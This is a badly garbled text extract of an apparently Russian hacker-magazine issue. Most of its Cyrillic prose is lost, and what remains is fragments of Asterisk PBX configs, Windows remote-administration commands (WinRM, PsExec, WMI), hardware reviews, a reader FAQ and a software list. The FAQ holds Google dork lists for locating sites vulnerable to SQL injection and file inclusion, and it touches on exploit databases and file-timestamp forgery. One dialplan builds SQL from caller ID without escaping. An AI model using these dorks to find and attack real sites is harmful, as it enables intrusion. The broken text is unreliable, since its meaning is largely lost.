exten => s,1,GotoIf($["${CALLERID(num)}" =
"9151234567"]?callback)
; ,

exten => s,n,Goto(normal) ;
,
exten => s,n(callback),System(/etc/asterisk/
scripts/callback 8${CALLERID(num)} &)
exten => s,n,Hangup()
exten => s,n(normal)
; ,

[InternalCall]
exten => 123,1,Dial(SIP/123)
exten => 123,n,Hangup()
exten => _89X.,1,Dial(SIP/${EXTEN}@GW_IP)
exten => _89X.,n,Hangup()

, call. , , System,
:
exten => h,6,System(echo Channel:
SIP/${CALLERID(num)} > /tmp/${CALLERID(num)}.
call)

:
$ sudo nano /etc/asterisk/scripts/callback
#!/bin/sh
sleep 5
X 03 /134/ 10

CALLBACK ELASTIX
cat << EOF > /tmp/$NUMBER.call
# ,
NUMBER=$1
# ,
echo "Channel: SIP/$NUMBER@InternalCall
# (.. 1 2 )
MaxRetries: 1
# ,
RetryTime: 30
#
WaitTime: 30
Context: InternalCall #
Extension: 777 #
Priority: 1
AlwaysDelete: Yes" >/var/spool/asterisk/
tmp/$NUMBER
EOF #
#
chown asterisk:asterisk /tmp/$NUMBER.call
mv /tmp/$NUMBER.call /var/spool/asterisk/
outgoing/

: , Asterisk
call-,
.
outgoing ;
Asterisk , , .
outgoing .
, .
, Callback web,
, call-
CGI-. .

, Callback
.
(,
), Asterisk . InternalCall
.
,
PIN

INFO

info

call-
AMI (Asterisk
Manager Interface)
Asterisk.

5038 .

AstBill
,


z 2008 .

121

SYN/ACK

FREEPBX
ASTERISK

HTTP://WWW
links
Asterisk
A2billing (www.
asterisk2billing.org),
Asterisell (asterisell.
profitoss.com).


CDR
Asterisk Queue/
CDR Log Analyzer
(www.micpc.com/
qloganalyzer),
Asterisk-Stat (www.
areski.net/asteriskstat-v2).

Asterisk
asteriskpbx.ru/
browser/astpbx/etc/
asterisk.

122

CDR- ASTERISK QUEUE/CDR LOG ANALYZER

.
Asterisk PIN-,
( ).
, .
, () allback SMS-, e-mail,
( ,
z 2009 ), (,
) . ,
.call-,

.


Asterisk, .
A2billing (www.asterisk2billing.
org), Asterisell (asterisell.profitoss.com), astCDRview
(astcdrview.berlios.de), AstBill (astbill.com), 9
10 . ,


, , Asterisk
.
Asterisk CDR-
(Call Detail Record). CallerID, , , ,
, ,
. Asterisk
CSV-, CDR MySQL, PostgreSQL, unixODBC,
RADIUS. , CSV- MySQL ,
(
www.voip-info.org/wiki/view/
Asterisk+CDR+csv+mysql+import).
MySQL Asterisk . AddOns.
Asterisk
. Debian/Ubuntu :
$ sudo apt-get install asterisk-mysql

, ,

:
. ,
(),
, .
, ,
.

. Asterisk VoIP- .
, , .

$ mysql -uroot -p
mysql> CREATE DATABASE asterisk;
mysql> GRANT ALL PRIVILEGES ON asterisk.*
TO asteriskuser@localhost IDENTIFIED BY
'astpassw';

Asterisk cdr_mysql.txt ( Ubuntu


/usr/share/doc/asterisk-mysql).
CDR MySQL,
asterisk:
$ sudo nano /etc/asterisk/cdr_mysql.conf
[global]
hostname=localhost
dbname=asterisk
table=cdr
password=astpassw
user=asteriskcdruser
port=3306
X 03 /134/ 10

ASTERISK
sock=/tmp/mysql.sock


Asterisk:
$ asterisk -r
CLI> module load cdr_addon_mysql.so

,
cdr mysql
status. Aster isk,
/etc/aster isk/modules.conf
:
load = cdr_addon_mysql.so


Asterisk

System() .
, , Asterisk
. , ,
(, ,
:)).
. winexe (eol.ovh.
org/winexe) Windows NT/2k/XP/2k3.
Linux-, Asterisk,
:
exten => s,n,Read(auth||4||1|5)
exten => s,n,GotoIf($["${auth}" = "000"]?yes:no) ;
exten => s,n(yes),System(winexe -U <DOMAIN>/<user>%<password> //<host>
"c:\script.bat" >>/var/log/asterisk/win.log)
exten => s,n(no),Hangup()
, script.bat.
X 03 /134/ 10

,
. MySQL,
. :
$ sudo nano /etc/asterisk/extensions.conf
;
exten => _X.,1,MYSQL(Connect
connid localhost asterisk astpassw
asterisk)
; , ( billsec ),
${resultid}
exten => _X.,2,MYSQL(Query resultid
${connid} SELECT SUM(billsec) FROM
cdr WHERE src=\'${CALLERID(num)}\')
; billing,
found 1,

exten => _X.,3,MYSQL(Fetch found


${resultid} billing)
;
exten => _X.,4,,MYSQL(Clear
${resultid})
; , ,

exten => _X.,5,GotoIf($["${found}" =
"1"]?true:false)
; ,
,

123

SYN/ACK

exten => _X.,6,GotoIf($["${billing}" <


""]?call:end)
exten => _X.,7,n(call),Dial()
exten => _X.,8,,MYSQL(Clear ${resultid})
exten => _X.,9,n,Hangup()
exten => _X.10,n(false),Playback(end)
exten => _X.1,n,Hangup()
; ,
,
MySQL
exten => h,1,MYSQL(Disconnect ${connid})

, SQL-. ,
123:
SELECT SUM(billsec) FROM `asterisk`.`cdr` WHERE
src='123'

, , . SQL- . ,
. ,
.
. SQL- , AGI-, .
CDR-. , Asterisk Queue/CDR Log Analyzer (www.micpc.com/qloganalyzer)
Asterisk-Stat (www.areski.net/asterisk-stat-v2).

Asterisk
, . , ,
. ,
, (speed dial), ,
, ,
2-3 . , :
exten => *01,1,Dial(SIP/_@${TRUNK},20)

, :
exten => lenok,1,Dial(SIP/server2/79101234567,20)

. - , . ,

, (
4232), (,
102030), (600000 ).
() 5
(300000 ) (60000
):

exten => _84232102030,1,Dial(SIP/8${EXTEN}@${OUTGOING},


,L[600000:300000:60000])

124

ASTERISK SIP
, .
(recall),
. Asterisk ,
.

*22, Callback *21.
$ sudo nano /etc/asterisk/extensions.conf
[IncomingCall]
;
exten => _5XX,1,Set(_To=${EXTEN})
exten => _5XX,n,Set(_From=${CALLERID(num)})
; *22
exten => _5XX,n,Set(DB(${To}/LastCaller)=${From})
; *21
exten => _5XX,n,Set(DB(${From}/LastCalled)=${To})
;
exten => _5XX,n,Dial(SIP/${EXTEN},20)
exten => _5XX,n,Hangup()
; *22 ,
exten => *22,1,Set(tmp=${DB(${CALLERID(num)}/
LastCaller})
exten => *22,n,SayDigits(${tmp})
exten => *22,n,Dial(${tmp},1)
; *21
exten => *21,1,Set(tmp=${DB(${CALLERID(num)}/
LastCalled)})
exten => *21,n,SayDigits(${tmp})
exten => *21,n,Set(DB(${tmp}/
CallBack)=${CALLERID(num)})
exten => *21,n,Hangup()


(re-dial):
[default]
include => macro-recall
exten
exten
exten
exten

=> _X.,1,Macro(recall,${EXTEN})
=> *0,1,DBget(toCall=redial/${CALLERID})
=> *0,2,Macro(recall,${toCall})
=> *0,102,Hangup()

[macro-recall]
exten => s,1,DBput(redial/${CALLERID}=${ARG1})
exten => s,1,Dial(SIP/${ARG1},20)
exten => s,2,Goto(s-${DIALSTATUS},1)
exten => s-NOANSWER,1,Voicemail(u${ARG1})
X 03 /134/ 10

MAKE MENUSELECT APP_FAX


exten => sBUSY,1,Voicemail(b${ARG1})
exten => _s-.,1,Goto(s-NOANSWER,1)

, , ,
Asterisk.

(Call Parking)
(Call Pickup), Asterisk.
Call Parking ,
parkext parkpos
features.conf:
[general]
;
parkext => 700
;
parkpos => 701-720

, ,
(all
hold)
. Call Pickup
*8.


, e-mail!
, ,
, . : ,
. .
IP- (FoIP, Fax over
IP) : .37 T.38.

e-mail
.

. T.38 X 03 /134/ 10

.
VoIP-
,
: ,
, , ,
IP-,
(
). .38 ,
UDP, TCP
.
UDP,
.
VoIP G.711.
Asterisk .38
:
,
. Asterisk 1.4.20.1
T.38-
SIP-.
: RxFAX/
TxFAX, SendFAX/ReceiveFAX (
SpanDSP, soft-switch.org)
HylaFax + iaxmodem ( , .37).
asterisk-addons
SpanDSP,
G711-.
1.6.0
SpanDSP
( app_fax).
,
,

1.6.2. ,
T.38, Asterisk
G711 T.38. 2009
Digium Fax
For Asterisk (res_fax res_fax_digium, digium.
com/en/products/software/faxforasterisk.

php),
, IP.
,
( $38.50). 1.8
Asterisk
Fax For Asterisk (
), app_fax.
, ,
. ,
.
, ,
, , ,
Asterisk
SpanDSP. ( libtiff),
Asterisk --with-spandsp.
make menuselect
app_fax ( Applications). :
$ sudo asterisk -r
CLI>core show applications like fax
ReceiveFAX: Receive a FAX
SendFAX: Send a FAX

.
$ sudo nano /etc/asterisk/sip.conf
[general]
t38pt_udptl = yes

:
$ sudo nano /etc/asterisk/
extensions.conf
exten => _5,n,Dial(${TRUNK_SIP}/
,120,M(sendfax))
;
[macro-sendfax]
exten => _X.,1,Set(FAXFILE=//var/
spool/asterisk/fax/fax)
exten => _X.,n,SendFAX(${FAXFILE}.
tif)
exten => _X.,n,Hangup
;
[macro-receivefax]
exten => _X.,1,Answer()
exten => _X.,n,Wait(3)
exten =>
_X.,n,ReceiveFAX(faxfilename)

, Asterisk .

Asterisk,

, ,
. ,
,
. z

125

SYN/ACK
grinder grinder@synack.ru


WINDOWS
, , . ,
, , . .
!
,
WinNT,
.
, , , , Unix ,
.
-
, .
WSH (Windows
Script Host) PowerShell,
WinRS (Windows Remote Shell), MMC
(Microsoft Management Console), WMI (Windows Management
Instrumentation),

RDP (Remote Desktop Protocol).
,

,

, , , .
C
RDP ,
RDP,
,

, , , ,
.. Vista,
-

126

32 ,
,
(mstsc /span). RDP 7,
Win7/2k8R2, , , Aero,
Direct2D Direct3D .
RDP

Windows ( Windows CE Mobile),
Linux, xBSD, Mac OS X .
, rdesktop
(rdesktop.org)
Win2k8 (
Win2k8R2 ).
Linux rdesktop
Gnome-RDP KDE
Remote Desktop Client.
SeamlessRDP (www.cendio.com/seamlessrdp)

Linux Windows.

,
.
,
.


(
).


, .

. -

,
, ,
, .

Remote Assistance
( ).
,
.
, .
Terminal Server mode ,
.
Win2k8
RDP.
TS RemoteApp (
RemoteApp ) Terminal
Services Web Access ( RemoteApp

).
Win2k8.

RDP-,
( Win2k3SP1,
WinXPSP2 ).

. RDP
VPN,
Terminal Services Gateway.
X 03 /134/ 10

Win2k Microsoft Remote Command Service (Rcmd.exe).


Rcmdsvc.exe
10 , Rcmd.exe.
Win2k3 Administration Tools Pack,
3 , : ADMgmt.msc ( Active
Directory), PKMgmt.msc ( ), IPAddrMgmt.msc (IP, DHCP, DNS, WINS). Remote Administration
(HTML) IIS - ( 8098). Win2k8
Server Manager, ,
, ,
. ,
Server Manager Win2k8R2. MMC
Win2k8, ,
(RSAT,
Remote Server Administration Tools), Win2k8
. , RSAT
Vista/Win7, Microsoft. C
Vista/Win7
, Win2k3/2k8/2k8R2.
, MMC ,
. (Computer
Management) (Another Computer). , ,
Windows, . , SC
\\synack:

Management (WS-Management Protocol),


XML-.
WinRM WMI- ( ), . HTTP/HTTPS,

, . WinRM
2.0 5985/5986, 47001/TCP. 80/443.
,
, Kerberos ( CredSSP).
.
Win2k8R2 Win7 WinRM 2.0.
WinXPSP3/2k3SP2/VistaSP1/2k8/2k8SP2 Windows Management Framework Core
(Windows PowerShell 2.0, WinRM 2.0, BITS 4.0, support.microsoft.com/
kb/968929). .
WinRM ,
:
> winrm quickconfig

, WinRM , 5985/5986,
Windows Firewall. WinRM
80/443, :
> winrm set winrm/config/service @{EnableCompatibilityH
ttpListener="true"}
> winrm set winrm/config/service @{EnableCompatibilityH
ttpsListener="true"}

> SC \\synack query type= service state= all

(Task Scheduler) /s,


,
, .

WINRM
WinRM Vista/Win2k8 Microsoft- Web Services for
X 03 /134/ 10

c ,
winrm enumerate winrm/config/listener
winrm get winrm/config. , - WinRM, 80 , : , WinRM
/wsman, -
URL.

. -

127

SYN/ACK

INFO

info
PowerShell

PowerShell

,
2009 .
PowerShell 2.0

Win2k8R2
Win7.

RDP (
3389)
WinNT 4.0 Terminal
Server.
RDP-
Unix Xrdp
(xrdp.sf.net).

,

.

RDP
,
NAT,
UPnP.
RDP
6

,

0,


/console.
Terminal
Services Web Access

,

-,

-.

128

MMC

Windows
Windows (Computer Configuration Administrative
Templates Windows Components Windows Remote
Management). , WinRS
WinRM. , (Allow automatic
configuration of listeners) IP, .
TrustedHosts:
> winrm set winrm/config/client @
{TrustedHosts="synack"}

, , get:
> winrm get winrm/config/client

WinRS.
,
'-r',
:
> winrs -r:synack cmd.exe
> hostname
synack
> ipconfig

SSH-,

. WinRS cmd,
,
winrs help. ,
, cmd:


POWERSHELL
WinRM 2.0,
: -,
HTTP/HTTPS, SSL .. ,
PowerShell Remoting
(
), ,
. PowerShell-, , ,
PowerShell ,
get-help about_signing.
. :
PS C:\> Get-ExecutionPolicy
Restricted


, .
RemoteSigned:
PS C:\> Set-ExecutionPolicy RemoteSigned

.
, PowerShell:
PS C:\> Enable-PSRemoting


( '-Force' ).

WinRM ,
WF ( winrs quickconfig,
Set-WSManQuickConfig), HTTP
WS-Management IP- .
:

> winrs -r:synack "dir C:"


PS C:\> Disable-PSRemoting

HTTP,
HTTPS :


, , Test-WSMan:

> winrs -r:https://synack "tasklist"


PS C:\> Test-WSMan -ComputerName synack.ru\

POWERSHELL REMOTING
PowerShell 2.0
Remoting.

PS-
: .
X 03 /134/ 10

WINRM
, Enter-PSSession, PowerShell :
PS C:\> Enter-PSSession synack.ru

, ,
.
, exit Exit-PSSession.


,
Invoke-Command.
,
( , ). ,
:

HTTP://WWW
links
Windows Management

PS C:\> Invoke-Command -ComputerName synack.ru


-ScriptBlock {Get-Service | Format-List}


( ),
. 445 :
PS C:\> $portcommand = {netsh firewall set
portopening tcp 445 smb enable}
PS C:\> Invoke-Command -ComputerName synack.ru
-ScriptBlock $portcommand

Framework Core
WinXP/2k3/Vista/2008

support.microsoft.
com/kb/968929.
Sysinternal
technet.microsoft.
com/ru-ru/
sysinternals.
Microsoft Script
Center technet.
microsoft.com/ruru/scriptcenter.

, Netsh
, . set
machine 'r', WINS/UNC/
DNS IP-:
X 03 /134/ 10

129

SYN/ACK

WBEMTEST WMI
> netsh -r synack.ru -u
administrator -p password diag gui

HTML- ( , , ),
.

PSEXEC PsExec
,

.
Sysinternals PsTools (technet.
microsoft.com/ru-ru/sysinternals).
,
,
%path%
(, system32).
system32\
psexesvc.exe, PsExec
( ).
.
:

130

psexec \\computer -u user -p passwd


command

,
.
,
,
.
:
> psexec \\synack cmd.exe

, .
,
, PsExec .
Windows NTLM Kerberos.
,
,
, , :
> psexec @c:\systems.txt shutdown
/p /f

. , '-c'

.
'-i'
. PsExec
, , '-d':
> psexec -d \\sysack chkdsk


,
.


WINDOWS , WMI

.
, ,
WMI .
,


. ,
,
, ,
Win7, WinXP, ,
. X 03 /134/ 10

DCOM
NTLM Kerberos,
, .
WMI MMC-
DCOMCnfg DCOM-,
WMI wmimgmt.msc.
Windows Firewall WMI:
> netsh advfirewall firewall set rule group="windows
management instrumentation (wmi)" new enable=yes

, tasklist . :
tasklist /S <> /U
<>\<>

, , , :
> tasklist /S \\synack

WMI . ,
.
Wmic /node. ,
:
> wmic /node:synack /USER:"username" useraccount list
brief

,
PsExec,
.
:
> wmic /node:synack process list
> wmic /node:synack process where(id="679") call
terminate
X 03 /134/ 10

WMI
Windows. Wbemtest.exe, (Remote),
(\\synack\root\cimv2),
.

,
.
,
. , Windows Script Host, .Net

,
.
. z

131

SYN/ACK
NATHAN BINKERT NAT@SYNACK.RU


Cisco WS-C2960-48TT-L:
2-


Cisco WS-C2960-48TT-L
> :
Auto MDI/MDIX
IEEE 802.1p (Priority tags)
IEEE 802.1q (VLAN)
IEEE 802.1d (Spanning Tree)
IEEE 802.1s (Multiple Spanning Tree)
> / (Flash):
64 / 32
> :
48 x Ethernet 10/100 /

>> SYN/ACK

> Uplink-:
2 x Ethernet 10/100/1000 /

> :
: 13,6 /
: 10,1 /
> :
Web-
SNMP 1,
RMON, Telnet, SNMP
3, SNMP 2c, SSHv2
> :

: 45

> MAC-:
8192

> :

445 x 44 x 236

WS-C2960-48TT-L Cisco ,
.
.
, Cisco WS-C2960-48TT-L
48
. :
,
.

:
c ,
MAC-, ,
Private VLAN Edge
,

NAC (Network Admission Control),


. SPAN (Switch Port
Analyzer)

.
TACACS+
RADUIS.

(QoS Quality of
Service) 64 . IP-
, MAC-,
. ECR, SRR sheduling, WTD,
Strict Priority queuing,
,

132

(CIR) 8 /. QoS. ,
VoIP
QoS .
uplink-,
GigabitEtherChannel.
Cisco Cluster Management Suite
(CMS).
, SNMP 1,
RMON, Telnet, SNMP 3, SNMP 2c SSHv2.
Web-.

Cisco Network Assistant, .

Express Setup.

66 075 .
X 03 /134/ 10


1U-:
XServe Quad-Core Intel Xeon Apple


AppleXserve
> :
Quad-Core Intel Xeon 5500
Nehalem 2.26, 2.66 2.93
> :
12
6 ; 1, 2 4
> :
SATA SAS
Apple
3 , 1 7200 rpm
SATA
1.35 , 450
15000 rpm SAS
> RAID:
RAID-
Xserve RAID Card - 512
72 -

>> SYN/ACK

> :
2 Gigabit Ethernet
(10/100/1000BASE-T)
jumbo frames

750
,

> :
16-
PCI Express 2.0:
(6.6
) 9.25-
> -:
2 FireWire 800 (
15 )
2 USB 2.0
1 DB-9 serial

1 USB 2.0
> :
8x SuperDrive
(DVD+R DL/
DVDRW/CD-RW)
NVIDIA
GeForce GT 120 256 GDDR3 SDRAM;
Mini DisplayPort ( VGA
DVI )

4,4
44,7
76,2
14 ;
17,4 SATA
1
> :

> :
750

> :
, 1U

> : Mac OS X Server


10.5 Leopard ( )

,
? ,
Apple
, 1U-.
Xserve Quad-Core Intel Xeon ( ).

-
, .
Quad-Core Intel
Xeon 5500 Nehalem 2.26 .

, 2.26, 2.66
2.93 .
3 12 .
3 SATA- 1 (
SSD-). RAID-
- 512 .
Gigabit
Ethernet (10/100/1000BASE-T)
PCI Express 2.0 ( ).
Xserve , . -, Apple' FireWire
(IEEE 1394b). -, , ,

Mac OS X Server 10.5 Leopard


. -,
NVIDIA GeForce GT 120 256 , , ,
.
. Xserve EFI
(Extensible Firmware Interface)
BIOS, ,

. ,
Linux,
, Windows ,
Win2k8/Win2k8R2. - , 130 000
. z

X 03 /134/ 10

133

UNITS

lozovsky@gameland.ru

PSYCHO:

, - , , . ,

, , ,
.

? .
,
,
,
, .


,
, .


,
- ,
,
,
. , ,
, ? , -,


/. , ,
,
.
,
,
(

).
, , ,

. , ,
.
1. .

134

,
, :
( ,
, , ,
/,
).

, , ,
. ,
,
.
( ,
- ,

, ,
). ,
, ,
.
.
.
, XXI , ,

( :)),
.

.
,
,
- ,
.
, ; (
- )
(
70- :
).
2. . ,
, ,
(, , , )
(, ,
, MMPI) ,
,
. ,
-
, ,
,
? ,
.


, , , , ( )
. , . !

X 03 /134/ 10

aka
:


. ,


:

.
,
, ,
.
3. .
,


,
,
.
:


.


,

,
, ;
,
, ;
,


. ,

,
,


? ,
,
,

. ,

, ,
,
, , ,
(, , ).
, , ,
,
-
,
,
( +
)
(-, : +
, ). ,
,
. ,
- ,

,
,

:). .
(
) , ,
,

- , .

,

:

:
, ,
. ,
( , 23). ,
( 23 24, ).

X 03 /134/ 10


.
?
. ,
?

?.
(-) , ,

,
.
, ,
. ?
, ,

,

, .

,

- .
,

.
,

? :)

, ,

,
,
,
,
.
-, ,
:).

:

135

UNITS

vs. . !
-
.
- (, ,
: 100 ,
).
,
,
:).

- , ,
-.
()
. 6
( ,
). , 2- ,
, -

. ,
, ,
600-
(
), , :
,
(, )
(
);
;
,
(, , ,
, , , );

,
(
),

/,
, ,

136

,
..
,
( - ),

.
, . ,


,

.

,


.

,
, , ,
( ). (, )
, - ,
( , ,
, ,
). ,
?
( ) .
,
( ,
, ,
, ,
), .
, , ,
.
. , :
. ,
. -


,

, ,
-,
. ,

.
, - .
? !
? !
? ? ?
? , ,
? , !
. . ,
.
,
,
(, , , ),
,
.
,
, . ( ,
ID Software, !),
,
,
, : ,
, , - .
,
. -
,
. , , . ,
,
, ,
,
,
, . !.
X 03 /134/ 10

: .
!

( .pdb).
, , .
:)
:
1. .

. ,
,
, ,
,
.
2. ,
, , ( ,
),
(
), (-- !), ,
.
3. , .
, ,
,
:).
4. , , ,
, ,
,
,


( ).
5.
.
?

,



.
.


,
X 03 /134/ 10


() ,
.
,
,
-
, -

? , ,

(
, )

() , , , ,

.

,
,
( )

,
,
. ,
,
:)
.
, -
-
, ,

,
, ,

, , ,
.
. ,

,

: : ,
, VIP, , , , ,
100% ! :)

( ,
,
)

.

,

PSYCHO
. , ,
, :).
.
, .
,
()
,

.
, ,

.

.
.
,
,
, ,
,


, . , !
.
,
,
,
.
.
, , , -

.


?

,
. , ,
,
. ,
,

. ,
,
. ,

,

, ,
,

,
.

!,

.
.

,



. ,
-

,
:). . z

137

UNITS

Step twitter.com/stepah

faq
united
@real.xakep.ru

, - ?
? faq@real.xakep.ru
!
: 4G USB- Samsung SWC-U200 Mobile
WiMAX YOTA.
Q: .
CMS ?
A: , ,

-,
- .

( CMS
),

tutsplus.com.
1. WordPress
(wordpress.org; 116,000,000
powered by wordpress);
2. Drupal ,
whitehouse.gov
(drupal.com;
inurl:node/N,
N );
3. Joomla! (joomla.org; 22,000,000 );
4. ExpressionEngine ,

138

(www.expressionengine.com; 3,530,000 );
5. TextPattern (textpattern.com;
500k );
6. Radiant CMS ,
CMS (radiantcms.org; 400k );
7. Cushy CMS ,
HTML

(www.cushycms.com; 200k );
8. SilverStripe , -
WordPress (www.silverstripe.org; 160k
);
9. Alfresco JSP (www.
alfresco.com; 100k
);
10. TYPOlight (www.typolight.org; 100k
).
,
CMS ( ),

:).
P.S.
: php.
opensourcecms.com, cmslist.ru, cmsmatrix.
org Open Source
sourceforge.net.
Q: . jQuery
Prototype. ?
A:
jQuery
noconflict-mode. ,
, :

<html>
<head>
<script src="prototype.js"></
script>
<script src="jquery.js"></script>
<script>
jQuery.noConflict();
X 03 /134/ 10

// Use jQuery via jQuery(...)


jQuery(document).
ready(function(){
jQuery("div").hide();
});
// Use Prototype with $(...),
etc.
$('someid').hide();
</script>
</head>
<body></body>
</html>


jQuery http://
docs.jquery.com/Using_jQuery_with_Other_
Libraries.
Q: ,
milw0rm.com?
A: -

, explo.it
( www.exploit-db.com)
. ,
milw0rm.com,
:
Remote Exploits ( );
Local Exploits ( );
Web Applications ( -);
DoS/PoC ( );
Shellcode (-);
Papers ();
Search ();
D (
);
Submit ( );
Rss (
).

: securityfocus.com securitylab.ru.
Q: ,
.
A: ! (dorks),
:
1. SQL-:

inurl:".php?id="
inurl:".php?cat="
inurl:".php?catid="
inurl:".php?num="
inurl:".php?bid="
inurl:".php?pid="
inurl:".php?nid="
inurl:".php?avd="
inurl:".php?file="

2. Local File Inclusion/Remote File Inclusion:


inurl:".php?pagina="
X 03 /134/ 10

inurl:".php?inc="
inurl:".php?include_file="
inurl:".php?page="
inurl:".php?show="
inurl:".php?cat="
inurl:".php?file="
inurl:".php?path_local="
inurl:".php?phpbb_root_dir="
inurl:".php?path_pre="
inurl:".php?nic="
inurl:".php?sec="
inurl:".php?content="
inurl:".php?link="
inurl:".php?filename="
inurl:".php?dir="
inurl:".php?document="
inurl:".php?view="
inurl:".php?sel="
inurl:".php?locate="
inurl:".php?place="
inurl:".php?layout="
inurl:".php?go="
inurl:".php?catch="
inurl:".php?mode="
inurl:".php?name="
inurl:".php?loc="
inurl:".php?f="
inurl:".php?inf="
inurl:".php?pg="
inurl:".php?load="
inurl:".php?naam="


, :).

Q: WebMoney, ?
A: WebMoney .
:
1. . WebMoney ,
files.webmoney.ru.
,


.
2.
, ,
, , ,
-.
gamelot.ru.
3. Digiseller.ru,
-.
4. (Software
activation service) ,
.
www.softactivation.com/asp/about.
asp.
5. WM-,
.
: trust.webmoney.ru.

Q: , PHP
e-mail?

Q: , *nix- , touch.
?
A: , touch
(mtime)
,
. ,
touch ,
,
, ctime (Change
Time)
(, ,
, ..). ,


find
:

"find [] -ctime -1".

,
.
: www.krazyworks.
com/changing-time www.securiteam.com/
tools/5JP0H2K7FE.html.
P.S.
(Dm).

A:

:

<?php
//
$subject = ' ';
$message = ' ';
$from_name = ' ';
$from_mail = ' ';
$to = ' ';
$priority = 1; //, 1 3
//
$body = "$message\n";
$from = "$from_name <$from_mail>";
$headers = "Content-Type: text/
html; charset=windows-1251\n";
$headers .= "From: $from_mail\n";
$headers .= "X-Mailer: The Bat!
2005\n";
$headers .= "X-Priority:
$priority\n";
//
mail($to,$subject,$body,$headers);
?>

139

UNITS

Q: -

Q:

, open-source!

Yota ,

A: ,

A:

WiMax- Wi-Fi?


[Life]: http://forum.antichat.ru/thread169495.
html.
:
;
;
;
;
site.com/string;
subdomen.site.com.
, http://
tinyurl.com.

A:


:
BDDBot (www.twmacinta.com/bddbot)
, ,
,
;
Sphider (www.sphider.eu)
PHP,
-, MySQL;
OpenWebSpider (www.openwebspider.org)
, ,
.
Nutch (lucene.apache.org/nutch)
Java;
XQEngine (xqengine.sourceforge.net) , XML-.

Q: SMS-

, , ..
, .
,
.
, ,

: Yota,
,
Interbro KWI B2200 .
,
Yota (192.168.1.1),

192.168.1.254,
.
, , , admin/admin, ,
Wi-Fi,
Yota.
, , Wi-Fi (
),
.

,
.
.

. , ,
(

Q: JS (-).

, ,

). : -

, ?

, ,

A: , , -

- ?

,
, : http://mtt.ru/info/def/index.wbp.
DEF (910, 903 ..),
, , , . .
,

. :
XML-.

A: ,

Q:

- ,
OWASP (www.owasp.org),
,
.
OWASP ESAPI4JS (http://code.google.com/p/
owasp-esapi-js).
,
,
, ,
JS-.
, ESAPI4JS
.

Q: - Windows
,
?
A: , -,
Windows 7. :
: gpedit.msc;
User Configuration\
Administrative Templates\System;
System Run only;
Enable ,
Options, Show
List of allowed applications;
,

.
, , ,

, Applocker,
Windows 7.

Q: ,
.
0 , 1
, .. ,

SMS , -

Q: - .

. -

: ,

:).

\u4241\u2743\u0D22\u000A, , , \x41\

x42\x43\x27\x22\x0D\x0A\x00?

, ,

A: BETA3 (http://code.
google.com/p/beta3), -
, 16 , .
.

A: Asterisk (www.
asterisk.org).
,
. ,
IVR- (Interactive Voice Response),
,
, , .
20 ,

.
http://nag.
ru/news/17515. z

A: , . ,

,
: Unlocker Dr.Web
(www.drweb.com/unlocker/index) Deblocker
(support.kaspersky.
ru/viruses/deblocker). ,
SMS,

.

140

Q: - Google-,
.

X 03 /134/ 10

>Multimedia
AmoK Exif Sorter 2.56
Asynx Planetarium 2.61
Celestia 1.6.0
DeskScapes
doPDF 7.1.326
Girder 5.0.10
Graffiti Studio
IcoFX 1.6.4
INKSAVER 2.0
Juice 2.2
Miro 2.5.4
Photocopier 3.05
TipCam 2.2
VideoCacheView 1.53

>Misc
Blue Lock 1.92
Ceedo Personal 3.1.0.22
Dicto 3 Beta
DocList Uploader 1.1
Eastegger 5.6.0.536
google docs upload 1.3.1
MojoPac 2.0
Partition Find and Mount 2.31
Portable Start Menu 3.0
Stick 2.8.0.82
TheSages English Dictionary and
Thesaurus 3.1.2
ToDoList 6.0.8
VirtuaWin 4.1
WinMerge 2.12.4
4.5

>Games
Mario Forever 4.4
Scorched3D Version 43beta
Soldat 1.5

>>WINDOWS
>>Development
>Development
3rdRail 2.0
Aptana RadRails 2.0.2
Arachno Ruby IDE 0.7.13
Arcadia 0.8.0
Axure RP Pro 5.6
DreamCoder for MySQL 5.1
DreamCoder for Oracle 4.0
DreamCoder for PostgreSQL 2.0
FreeRIDE 0.9.6
haXe 2.05
IronRuby 1.0-rc1
Komodo Edit 5.2.4
qt4-qtruby 2.0.3
Ruby 1.9.1
Ruby DBI 0.4.3
Ruby In Steel Developer 2008 1.4
Ruby on Rails 2.3.4
Ruby-GNOME2 0.19.3
RubyGems 1.3.5
SlickEdit 2009
Treebeard XSLT IDE 0.9.5 Beta
TurboRuby 1.2
wxRuby 2.0.1

>>UNIX
>Desktop
aTunes 1.13.6
Audacious 2.2.0
Discwrapper 1.2.2

>System
Auslogics System Information 1.5.20
Boot-US 2.1.7
Crucial System Scanner
EASEUS Partition Master
Professional Giveaway 4.1.1
GhostWall FireWall 1.150
Kerio WinRoute Firewall 6.7.1
KeyScrambler Personal 2.6.0
muCommander 0.8.4
Pandora Recovery 2.1.1
Process Tamer 2.11.01
Returnil Virtual System 2010 Home
Free 3.1.7779
Sandboxie 3.42
TeraCopy 2.1
Unknown Device Identifier 7.00
Video Memory stress Test 1.7
What Changed 1.06
Wubi 9.100

>Security
BotHunter 1.5
Code Crawler 2.5.1
dirb 1.8
ESAPI for .Net 0.2
ESAPI for Java 2.0 rc4
ESAPI on Python 1.0
GMER 1.0.15
KeePass 2.09
ncrack 0.01
Nmap 5.21
OWASP ESAPI for PHP 1.0a
Scapy last
SecuBat v0.5
SpotAuditor 3.9.3
Technitium MAC Address Changer
5.0R3
The Dude 3.5
Windows File Analyzer 1.0.0
Wireshark 1.2.6
WITOOL 0.1

>Net
Deluge 1.2.0
digsby Build 75
Kiwi CatTools 3.4.0
Lastpass 1.64.4
Medieval Bluetooth Network
Scanner 1.4
Nemesis 1.4
OpenVPN 2.1.1
PrinterShare 2.1.2
SRWare Iron 4.0.280
Whisher for Windows 7.04
WirelessMon 3.1
. 3.0.3

VideoInspector 2.2.3.122

>Security
BotHunter 1.5.0
Chaosreader 0.94

>Net
Aria2 1.8.0
AsItHappens 0.57
Claws Mail 3.7.4
DCsharp 0.11.1
Deluge 1.2.0
Gajim 0.13.2
Mozilla Firefox 3.6
Netkit 2.7
NetworkManager 0.7.2
Opera 10.50
SABnzbd 0.4.12
SIM 0.9.4.3
Skype 2.1.0.81
Smuxi 0.7
Transmission 1.82
Twitux 0.69
Vacuum IM 1.0.0
WeeChat 0.3.1
Wicd 1.7

>Games
Danger from the deep 0.3.0

>Devel
Aptana Studio 2.0
Armadillo 0.8.2
Bazaar 2.0.4
BuildBot 0.7.12
Ceno 0.0.2
Clojure 1.1
Erlang R13B03
FreePascal 2.4
GCC 4.4.3
GHC 6.12.1
libxml2 2.7.6
NetBeans 6.8
OpenSwing 2.1.4
Poco 1.3.6p2
Premake 4.2
Ptex 2.0.0
Python 2.6.4
RabbitVCS 0.12.1
Selenium IDE 1.0.2
Subversion 1.6.9

